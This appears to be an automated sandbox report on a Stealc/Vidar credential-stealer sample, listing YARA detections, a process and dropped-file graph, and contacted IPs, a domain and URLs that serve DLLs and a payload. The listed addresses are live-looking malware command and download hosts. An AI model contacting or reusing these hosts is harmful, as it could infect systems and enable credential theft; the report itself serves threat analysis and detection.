Source: Blank.pif.2.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 16.2.1248.tmp.exe.a00e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.1248.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.1248.tmp.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.1248.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.1248.tmp.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.1248.tmp.exe.a00e67.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3346073741.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.3002753873.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00422A0C Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext, 15_2_00422A0C
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00421D36 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 15_2_00421D36
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C320C40 sqlite3_bind_zeroblob, 16_2_6C320C40
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C320D60 sqlite3_bind_parameter_name, 16_2_6C320D60
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C248EA0 sqlite3_clear_bindings, 16_2_6C248EA0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C320B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 16_2_6C320B40
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C246410 bind,WSAGetLastError, 16_2_6C246410
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530592 Sample: hlyG1m5UmO.exe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 88 tjKhgPhoLOjoHpkZoehqyy.tjKhgPhoLOjoHpkZoehqyy 2->88 90 post-to-me.com 2->90 104 Multi AV Scanner detection for domain / URL 2->104 106 Suricata IDS alerts for network traffic 2->106 108 Found malware configuration 2->108 110 11 other signatures 2->110 14 hlyG1m5UmO.exe 26 2->14         started        signatures3 process4 process5 16 cmd.exe 2 14->16         started        file6 60 C:\Users\user\AppData\Local\...\Blank.pif, PE32 16->60 dropped 98 Uses ping.exe to sleep 16->98 100 Drops PE files with a suspicious file extension 16->100 102 Uses ping.exe to check the status of other devices and networks 16->102 20 Blank.pif 16->20         started        23 cmd.exe 2 16->23         started        25 conhost.exe 16->25         started        27 7 other processes 16->27 signatures7 process8 signatures9 120 Injects a PE file into a foreign processes 20->120 29 Blank.pif 1 17 20->29         started        process10 dnsIp11 94 176.113.115.37, 49979, 49981, 80 SELECTELRU Russian Federation 29->94 96 post-to-me.com 104.21.56.70, 443, 49978 CLOUDFLARENETUS United States 29->96 82 C:\Users\user\AppData\Local\...\1248.tmp.exe, PE32 29->82 dropped 84 C:\Users\user\...\ScreenUpdateSync[1].exe, PE32 29->84 dropped 33 1248.tmp.exe 52 29->33         started        file12 process13 dnsIp14 86 62.204.41.176, 49980, 80 TNNET-ASTNNetOyMainnetworkFI United Kingdom 33->86 62 C:\Users\user\AppData\...\softokn3[1].dll, PE32 33->62 dropped 64 C:\Users\user\AppData\Local\...\seed[1].exe, PE32 33->64 dropped 66 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 33->66 dropped 68 11 other files (3 malicious) 33->68 dropped 112 Detected unpacking (changes PE section rights) 33->112 114 Detected unpacking (overwrites its own PE header) 33->114 116 Tries to steal Mail credentials (via file / registry access) 33->116 118 6 other signatures 33->118 38 cmd.exe 33->38         started        40 WerFault.exe 33->40         started        43 WerFault.exe 33->43         started        45 10 other processes 33->45 file15 signatures16 process17 file18 47 LocalCGIDAAAKJJ.exe 38->47         started        50 conhost.exe 38->50         started        70 C:\ProgramData\Microsoft\...\Report.wer, Unicode 40->70 dropped 72 C:\ProgramData\Microsoft\...\Report.wer, Unicode 43->72 dropped 74 C:\ProgramData\Microsoft\...\Report.wer, Unicode 45->74 dropped 76 C:\ProgramData\Microsoft\...\Report.wer, Unicode 45->76 dropped 78 C:\ProgramData\Microsoft\...\Report.wer, Unicode 45->78 dropped 80 7 other malicious files 45->80 dropped process19 signatures20 124 Multi AV Scanner detection for dropped file 47->124 52 cmd.exe 47->52         started        process21 signatures22 122 Uses ping.exe to sleep 52->122 55 PING.EXE 52->55         started        58 conhost.exe 52->58         started        process23 dnsIp24 92 2.2.2.2 FranceTelecom-OrangeFR France 55->92
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
176.113.115.37
 unknown Russian Federation
49505 SELECTELRU false
2.2.2.2
 unknown France
3215 FranceTelecom-OrangeFR true
62.204.41.176
 unknown United Kingdom
30798 TNNET-ASTNNetOyMainnetworkFI true
104.21.56.70
 post-to-me.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
post-to-me.com 104.21.56.70 true
tjKhgPhoLOjoHpkZoehqyy.tjKhgPhoLOjoHpkZoehqyy unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://62.204.41.176/db293a2c1b1c70c4/mozglue.dll true
    		unknown
    http://62.204.41.176/db293a2c1b1c70c4/nss3.dll true
      		unknown
      https://post-to-me.com/track_prt.php?sub=0&cc=DE false unknown
      http://62.204.41.176/db293a2c1b1c70c4/softokn3.dll true
        		unknown
        http://62.204.41.176/db293a2c1b1c70c4/vcruntime140.dll true
          		unknown
          http://62.204.41.176/edd20096ecef326d.php true unknown
          http://62.204.41.176/db293a2c1b1c70c4/sqlite3.dll true
            		unknown
            http://176.113.115.37/seed.exe false unknown
            http://62.204.41.176/db293a2c1b1c70c4/freebl3.dll true
              		unknown
              http://62.204.41.176/db293a2c1b1c70c4/msvcp140.dll true
                		unknown
                http://62.204.41.176/ true
                  		unknown